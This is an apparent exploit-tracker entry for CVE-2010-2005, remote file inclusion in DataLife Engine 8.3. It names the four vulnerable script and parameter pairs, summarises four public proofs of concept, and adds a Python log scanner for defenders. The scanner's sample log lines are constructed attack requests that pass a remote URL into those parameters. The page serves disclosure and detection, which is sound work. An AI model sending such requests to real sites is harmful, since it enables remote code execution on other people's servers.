CVE-2010-2005
DataLife Engine 8.3 - Remote Code Execution via PHP File Inclusion
Title source: llm
Exploitation Summary
EIP tracks 4 public exploits for CVE-2010-2005. PoCs published by indoushka.
AI-analyzed exploit summary: This exploit demonstrates a remote file inclusion vulnerability in DataLife Engine 8.3 by manipulating the 'selected_language' parameter in init.php to include arbitrary remote files. The attack leverages insufficient input sanitization to execute remote code.
Description
Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the selected_language parameter to engine/inc/include/init.php, (2) the config[langs] parameter to engine/inc/help.php, (3) the config[lang] parameter to engine/ajax/pm.php, and (4) the _REQUEST[skin] parameter to engine/ajax/addcomments.php.
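For defenders reviewing web server logs, the following added example (not taken from the published PoCs or from DLE itself) flags requests to the four scripts named above whose listed parameter carries a URL-like value. It assumes combined-format access logs; the sample lines and hosts are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter pairs, as listed in the CVE description.
AFFECTED = {
    "/engine/inc/include/init.php": "selected_language",
    "/engine/inc/help.php": "config[langs]",
    "/engine/ajax/pm.php": "config[lang]",
    "/engine/ajax/addcomments.php": "_REQUEST[skin]",
}
# A language or skin name should never look like a URL.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|//|data:)", re.I)
REQUEST_LINE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def flag_line(line):
    """Return (script, parameter, value) for a suspicious request, else None."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    for script, param in AFFECTED.items():
        if not target.path.lower().endswith(script):
            continue
        # parse_qsl percent-decodes names and values, so config%5Blangs%5D
        # and http%3A%2F%2F... are matched as well as the literal forms.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == param and REMOTE_VALUE.match(value):
                return (script, param, value)
    return None

def scan(lines):
    """Return the hits for every flagged line, in input order."""
    return [hit for hit in map(flag_line, lines) if hit]

# Constructed sample lines (combined log format); hosts are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2010:10:00:01 +0000] "GET /engine/inc/help.php?config%5Blangs%5D=http%3A%2F%2Fhost.example%2Fa.txt%3F HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [01/Jun/2010:10:00:02 +0000] "GET /dle/engine/ajax/addcomments.php?_REQUEST[skin]=//host.example/s HTTP/1.0" 200 90 "-" "-"',
    '192.0.2.12 - - [01/Jun/2010:10:00:03 +0000] "GET /engine/ajax/pm.php?config[lang]=Russian HTTP/1.1" 200 300 "-" "-"',
    '192.0.2.13 - - [01/Jun/2010:10:00:04 +0000] "GET /index.php?selected_language=http://host.example/a HTTP/1.1" 200 300 "-" "-"',
    '192.0.2.14 - - [01/Jun/2010:10:00:05 +0000] "GET /engine/inc/include/init.php?selected_language=ftp://host.example/x HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so parameters sent in a POST body need request-body logging or a WAF rule to be seen.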
Exploits (4)
This exploit demonstrates a remote file inclusion vulnerability in DataLife Engine 8.3 by manipulating the 'selected_language' parameter in init.php to include arbitrary remote files. The attack leverages insufficient input sanitization to execute remote code.
The code describes a remote file inclusion vulnerability in DataLife Engine 8.3 due to insufficient sanitization of user-supplied data in the 'config[langs]' parameter. Exploitation could allow arbitrary file inclusion and potential remote code execution.
This exploit demonstrates a remote file inclusion vulnerability in DataLife Engine 8.3 by injecting a malicious URL into the 'config[lang]' parameter. The lack of input sanitization allows an attacker to include arbitrary remote files, potentially leading to remote code execution.
This exploit demonstrates a remote file inclusion vulnerability in DataLife Engine 8.3 by manipulating the `_REQUEST[skin]` parameter to include arbitrary remote files. The vulnerability arises from insufficient sanitization of user-supplied input.